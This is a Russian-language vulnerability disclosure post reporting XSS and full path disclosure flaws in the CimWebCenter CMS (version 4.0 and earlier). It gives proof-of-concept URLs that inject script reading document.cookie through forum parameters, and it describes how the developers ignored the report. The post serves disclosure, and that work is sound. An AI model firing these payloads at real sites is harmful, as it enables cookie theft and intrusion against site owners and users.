Уязвимости в CimWebCenter
Еще 26.06.2006 я нашел Cross-Site Scripting и Full path disclosure уязвимости в системе CimWebCenter. Дырки обнаружил на официальном сайте системы http://cimwebcenter.com, а также проверил их еще на двух сайтах на данной CMS (где и обнаружил Full path disclosure ).
XSS:
http: / / site / forum /? mid = 28 & do = show_mess & tid = 26% 3E% 3Cscript% 3Ealert (document.cookie)% 3C/script% 3E & mode =- 1
http://site/forum/?mid=28&do = show_mess & tid = 26 & mode =- 1% 22% 3E% 3Cscript% 3Ealert (document.cookie)% 3C/script% 3E
Full path disclosure:
http://site/forum/? mid = 28 & do = show_mess & tid = 26 & mode =/
http://site/forum/?mid=28&do=/&tid=26&mode=-1
http://site/forum/? mid = / & do = show_mess & tid = 26 & mode =- 1
уязвимые CimWebCenter 4.0 и предыдущие версии
О уязвимости я сразу же сообщил разработчикам, которые не ответили и полностью проигнорировали мое сообщение. Это было еще до открытия моего сайта и поэтому об этом случае я не написал в новостях (но я заметил, чтобы об этих уязвимости вспомнить, и сегодня наконец я нашел время для этого ).
Данный случай был одним из многих в период с 2005 по середину 2006, когда владельцы сайтов и веб девелоперы преимущественно игнорировали мои сообщения об уязвимости. Что и побудило меня сделать свой веб проект (в Летом 2006), в котор??м публично обнародовать информацию об уязвимости на сайтах и в веб приложениях, чтобы стимулировать админов и девелоперов исправлять дыры. Данную деятельность я тогда и назвал социальным секюрити аудитом.
